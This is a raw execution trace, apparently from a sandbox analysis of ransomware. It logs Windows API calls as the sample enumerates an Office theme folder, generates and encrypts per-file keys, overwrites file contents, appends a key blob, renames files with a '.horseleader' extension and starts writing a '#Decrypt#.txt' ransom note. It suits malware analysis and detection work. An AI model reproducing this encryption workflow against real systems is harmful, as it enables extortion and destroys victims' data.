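GetProcessHeap () returned 0x780000 [0246.617] RtlAllocateHeap 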
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.617] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\*") returned 70 [0246.617] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6073a7d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.618] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.618] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\.") returned 70 [0246.618] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.618] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6073a7d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.618] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.618] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\..") returned 71 [0246.618] lstrcmpW (lpString1="..", lpString2=".") 
returned 1 [0246.618] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.618] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf641f700, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf641f700, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x116dc, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="DEEPBLUE.ELM", cAlternateFileName="")) returned 1 [0246.618] lstrcmpiW (lpString1="DEEPBLUE.ELM", lpString2="Windows") returned -1 [0246.618] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM") returned 81 [0246.618] StrStrIW (lpFirst="DEEPBLUE.ELM", lpSrch=".horseleader") returned 0x0 [0246.618] lstrcmpW (lpString1="DEEPBLUE.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.618] lstrcmpW (lpString1="DEEPBLUE.ELM", lpString2="_uninstalling_.png") returned 1 [0246.618] lstrlenW (lpString=".testttjffg") returned 11 [0246.618] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM", lpSrch=".testttjffg") returned 0x0 [0246.618] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.618] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.619] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.623] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM") returned 81 [0246.623] StrStrW (lpFirst="DEEPBLUE.ELM", lpSrch=".txt") returned 0x0 [0246.623] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=71388) returned 1 [0246.623] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.623] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.633] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.633] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.635] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x636e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.635] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.635] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.636] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.636] 
SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xc6dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.636] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.637] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.637] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.637] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.637] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.638] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.638] CloseHandle (hObject=0x1a4) returned 1 [0246.638] GetProcessHeap () returned 0x780000 [0246.638] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.639] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM.horseleader") returned 93 [0246.639] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM" (normalized: "c:\\program files\\common files\\microsoft 
shared\\themes14\\deepblue\\deepblue.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.elm.horseleader")) returned 1 [0246.640] GetProcessHeap () returned 0x780000 [0246.640] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.640] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x239, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="DEEPBLUE.INF", cAlternateFileName="")) returned 1 [0246.640] lstrcmpiW (lpString1="DEEPBLUE.INF", lpString2="Windows") returned -1 [0246.640] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF") returned 81 [0246.640] StrStrIW (lpFirst="DEEPBLUE.INF", lpSrch=".horseleader") returned 0x0 [0246.640] lstrcmpW (lpString1="DEEPBLUE.INF", lpString2="#Decrypt#.txt") returned 1 [0246.640] lstrcmpW (lpString1="DEEPBLUE.INF", lpString2="_uninstalling_.png") returned 1 [0246.640] lstrlenW (lpString=".testttjffg") returned 11 [0246.641] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF", lpSrch=".testttjffg") returned 0x0 [0246.641] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.641] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, 
pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.641] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.642] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF") returned 81 [0246.642] StrStrW (lpFirst="DEEPBLUE.INF", lpSrch=".txt") returned 0x0 [0246.642] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=569) returned 1 [0246.642] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x239, lpOverlapped=0x0) returned 1 [0246.644] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdc7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.644] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x239, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x239, lpOverlapped=0x0) returned 1 [0246.644] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.644] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.644] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 
[0246.645] CloseHandle (hObject=0x1a4) returned 1 [0246.645] GetProcessHeap () returned 0x780000 [0246.645] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.645] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF.horseleader") returned 93 [0246.645] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.inf.horseleader")) returned 1 [0246.691] GetProcessHeap () returned 0x780000 [0246.691] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.691] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xf75, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.691] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.691] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 80 [0246.691] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.691] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 
[0246.691] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.691] lstrlenW (lpString=".testttjffg") returned 11 [0246.691] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.691] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.691] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.692] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.692] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 80 [0246.692] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.692] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=3957) returned 1 [0246.692] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xf75, lpOverlapped=0x0) returned 1 [0246.717] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff08b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.717] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xf75, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xf75, lpOverlapped=0x0) returned 1 [0246.718] SetFilePointerEx (in: 
hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.718] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.718] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.718] CloseHandle (hObject=0x1a4) returned 1 [0246.718] GetProcessHeap () returned 0x780000 [0246.718] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.718] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.horseleader") returned 92 [0246.718] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif.horseleader")) returned 1 [0246.719] GetProcessHeap () returned 0x780000 [0246.719] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.719] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, 
nFileSizeHigh=0x0, nFileSizeLow=0x81fd, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.719] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.719] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 81 [0246.719] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.720] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.720] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.720] lstrlenW (lpString=".testttjffg") returned 11 [0246.720] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.720] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.720] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.720] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.728] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 81 [0246.728] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.728] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=33277) returned 1 [0246.728] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, 
nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.731] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.731] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.731] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x31fd, lpOverlapped=0x0) returned 1 [0246.732] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffce03, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.732] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x31fd, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x31fd, lpOverlapped=0x0) returned 1 [0246.732] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.732] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.732] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.732] CloseHandle (hObject=0x1a4) returned 1 [0246.733] GetProcessHeap () returned 0x780000 [0246.733] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7e31a8 [0246.733] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.horseleader") returned 93 [0246.733] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png.horseleader")) returned 1 [0246.734] GetProcessHeap () returned 0x780000 [0246.734] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.734] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x81fd, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.734] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.734] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\#Decrypt#.txt") returned 82 [0246.734] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
